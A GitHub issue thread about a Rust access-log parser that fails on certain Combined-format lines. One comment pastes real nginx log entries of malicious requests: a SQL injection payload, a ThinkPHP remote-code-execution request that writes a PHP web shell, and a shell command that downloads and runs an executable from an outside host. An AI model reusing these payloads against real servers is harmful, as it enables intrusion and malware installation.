### ISSUE TITLE
Unable to parse log line

### ISSUE THREAD

**Issue by daniellockyer** [dmikusa/access_log_parser#7]
Hey @dmikusa-pivotal 🙂 

I'm working on using your library for something, but I've run into some edge cases with the parser. I'm using the Combined log format and the following input fails to parse with some real world data I have:

```
127.0.0.1 - - [13/Jun/2022:05:26:31 +0100] "GET / HTTP/1.1" 301 166 "example.com" "-f" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36" 0.000 - 0e28d0563f4b737fce783ca10208cf8a - "-"
```

Error:
```
ParseError {
    msg: "0: at line 1:\n127.0.0.1 - - [13/Jun/2022:05:26:31 +0100] \"GET / HTTP/1.1\" 301 166 \"example.com\" \"-f\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\" 0.000 - 0e28d0563f4b737fce783ca10208cf8a - \"-\"\n                                                                                    
^\nexpected '\"', found f\n\n1: at line 1, in quoted_dash_or_str:\n127.0.0.1 - - [13/Jun/2022:05:26:31 +0100] \"GET / HTTP/1.1\" 301 166 \"example.com\" \"-f\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\" 0.000 - 0e28d0563f4b737fce783ca10208cf8a - \"-\"\n                                                                                  
^\n\n2: at line 1, in user_agent:\n127.0.0.1 - - [13/Jun/2022:05:26:31 +0100] \"GET / HTTP/1.1\" 301 166 \"example.com\" \"-f\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\" 0.000 - 0e28d0563f4b737fce783ca10208cf8a - \"-\"\n                                                                                  
^\n\n3: at line 1, in combined_log:\n127.0.0.1 - - [13/Jun/2022:05:26:31 +0100] \"GET / HTTP/1.1\" 301 166 \"example.com\" \"-f\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\" 0.000 - 0e28d0563f4b737fce783ca10208cf8a - \"-\"\n^\n\n",
}
```

**Comment by dmikusa** [comment]
Sorry for the slow response. It looks to be having trouble with the reported User-agent. It's saying `expected '\"', found f\n\n1`, which isn't entirely helpful but appears to be complaining about not finding the double quote that should surround the user-agent.

I'm suspecting that it's the `-f` that's messing it up for some reason, but I'm not sure off-hand. I'll try to take a closer look and see what might be breaking it.

**Comment by dmikusa** [comment]
Ohh, I think I know why that's a problem. So some of the fields can be listed as `"-"`, so having the `"-f"`, it's probably tripping up the parser, it sees the leading dash and thinks it's an empty field. I can play around with that and try to confirm.

**Comment by dmikusa** [comment]
OK, looking a little closer the line is not valid. I don't think "combined" is any sort of official standard, but where I've seen it defined is in Apache HTTPD (that is where I based this code anyway), which is this:

https://httpd.apache.org/docs/2.4/logs.html#combined

>LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" combined

>127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 "http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I ;Nav)"

The difference is that your log line has some extra stuff. There is an extraneous item between the referrer and user agent, that is the `"-f"`. Your actual user agent is one field past that. There are also some fields at the end which are not part of the format. The stuff at the end is just ignored by the parser, but the `"-f"` breaks the format because it throws off the expected order.

What generated this log? Are all of your log entries like that or did this one log entry fail? Just trying to understand the situation more. Thanks!

**Comment by jonvaldes** [comment]
Hello!
I was just parsing a bunch of nginx access logs (also using the Combined mode), and I have a bunch of logs of malicious requests that also break the parser.

Examples:

```
185.7.214.104 - - [19/Jul/2022:05:17:30 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 400 0 "http://104.248.89.138:80/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
```

```
222.240.1.51 - - [11/Jun/2019:02:46:24 +0000] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.1" 301 184 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\x22id\x22;s:3:\x22'/*\x22;s:3:\x22num\x22;s:141:\x22*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
```

```
112.27.226.150 - - [31/Mar/2019:16:21:50 +0000] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 400 672 "http://5.101.103.187:443/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
```

```
112.27.226.150 - - [31/Mar/2019:16:21:50 +0000] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/buhdunskgamjofq21298.exe');start%20C:/Windows/temp/buhdunskgamjofq21298.exe HTTP/1.1" 400 672 "http://5.101.103.187:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/buhdunskgamjofq21298.exe');start C:/Windows/temp/buhdunskgamjofq21298.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
```

It's hardly surprising that these requests are the ones that break the parser, but they might be useful in helping make the parser more robust.

**Comment by dmikusa** [comment]
I appreciate you sharing the examples and I'll take a look to see why the parser flags them as invalid, but I want to say that the intent of the parser isn't to parse anything you can throw at it. If the request is invalid, the parser is doing the right thing by returning an error. 

It's then up to the consumer to decide what to do with that invalid requests, be it performing some additional processing or flag them for human review or whatever.
